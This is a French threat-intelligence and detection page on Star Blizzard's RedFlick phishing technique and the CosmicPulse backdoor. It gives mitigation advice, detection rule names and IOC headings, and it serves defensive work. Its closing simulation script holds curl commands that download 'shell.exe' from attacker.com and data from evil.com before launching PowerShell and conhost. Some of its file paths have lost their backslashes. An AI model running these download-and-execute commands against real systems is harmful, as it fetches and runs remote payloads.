Star Blizzard utilise RedFlick pour améliorer le phishing et le déploiement de logiciels malveillants
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
L’agent parrainé par l’État russe, Star Blizzard, a évolué dans son savoir-faire en utilisant la technique RedFlick pour livrer la porte dérobée CosmicPulse. L’acteur est passé de campagnes de spear-phishing ciblées à des campagnes de phishing automatisées à plus grande échelle utilisant des sites compromis. Ces campagnes utilisent des méthodes de livraison sophistiquées, y compris des fichiers VHDX et des charges utiles cachées dans des fichiers PDF pour échapper à la détection.
Enquête
Microsoft Threat Intelligence a analysé diverses vagues de phishing observées tout au long de 2026, identifiant une transition des chaînes basées sur ClickFix vers des tâches planifiées RedFlick. L’enquête a détaillé un flux d’exécution en plusieurs étapes impliquant des fichiers LNK, l’exécution de commandes locales SSH et l’utilisation de WebDAV pour la récupération de charges utiles distantes. L’analyse technique a également révélé l’utilisation de la stéganographie et du chiffrement basé sur le registre pour la charge utile CosmicPulse.
Atténuation
Les organisations doivent mettre en œuvre une authentification résistante au phishing et des politiques d’accès conditionnel pour sécuriser les identités. La protection des points de terminaison doit être configurée avec EDR en mode bloc et la protection antivirus en temps réel activée. De plus, la mise en œuvre de règles de réduction de la surface d’attaque peut prévenir l’exécution de scripts obscurcis et de fichiers exécutables non autorisés.
Réponse
Lors de la détection, les équipes de sécurité doivent utiliser l’EDR pour remédier aux artefacts malveillants et enquêter sur les tentatives de connexion suspectes. Les modes d’enquête et de remédiation automatisées doivent être activés pour réduire les temps de réponse. Les organisations doivent également utiliser des solutions anti-phishing avancées et la purge automatique zéro heure pour neutraliser les communications malveillantes entrantes.
Flux d’attaque
Nous mettons toujours à jour cette partie.
Détections
Ligne de commande suspecte contenant un chemin UNC avec un exécutable comme argument (via cmdline)
Découverte possible de partages réseau (via cmdline)
Tentatives d’installation cachées de l’installateur distant MsiExec suspectes (via cmdline)
LOLBAS Conhost (via cmdline)
Utilisation possible d’un outil de tunneling [Windows] (via cmdline)
Utilisation suspecte de CURL (via cmdline)
Commande et contrôle suspect par requête DNS de domaine de premier niveau (TLD) inhabituel (via dns)
IOCs (HashSha256) pour détecter : Star Blizzard affine le phishing et la livraison de logiciels malveillants avec la technique RedFlick
IOCs (SourceIP) pour détecter : Star Blizzard affine le phishing et la livraison de logiciels malveillants avec la technique RedFlick
IOCs (DestinationIP) pour détecter : Star Blizzard affine le phishing et la livraison de logiciels malveillants avec la technique RedFlick
Détection de l’exécution de PowerShell à partir d’un PDF téléchargé [Windows Powershell]
Détection de la technique RedFlick de Star Blizzard – Tâches planifiées et exécution en ligne de commande [Création de processus Windows]
Exécution de simulation
-
Narrative & Commandes de l’attaque : L’adversaire livre un e-mail de phishing contenant un lien vers un fichier malveillant. Lors de l’interaction, une séquence est déclenchée où
curlest utilisé pour récupérer une étape secondaire. Pour se fondre dans les processus système, la commande est conçue pour inclure explicitement les termesPowerShell,PDF(référençant la source du déclencheur), etconhost.exedans la chaîne de commande pour correspondre à la logique de la règle de détection cible. L’objectif est d’exécuter une charge utile décodée intégrée dans une structure PDF. -
Script de test de régression :
# Script de simulation pour déclencher la règle 'Détecter l'exécution de PowerShell à partir de PDF téléchargé'. # Ce script construit une chaîne de ligne de commande incluant les quatre mots-clés requis. $fakePdfPath = "C:UsersPublicDocumentsinvoice_decoy.PDF" $cmd = "cmd.exe /c curl -o payload.exe http://attacker.com/shell.exe & PowerShell.exe -Command `& {Write-Host 'Extraction depuis PDF...'; Start-Process conhost.exe}" # Nous exécutons via cmd pour garantir que conhost.exe fait partie de l'arborescence des processus/contexte de commande Start-Process cmd.exe -ArgumentList "/c curl -o data.bin http://evil.com/ & PowerShell -Command `"Extraction depuis PDF... utilisant conhost.exe`"" -
Commandes de nettoyage :
# Nettoyer les fichiers générés lors de la simulation Remove-Item -Path "C:UsersPublicDocumentsinvoice_decoy.PDF" -ErrorAction SilentlyContinue Remove-Item -Path "data.bin" -ErrorAction SilentlyContinue Remove-Item -Path "payload.exe" -ErrorAction SilentlyContinue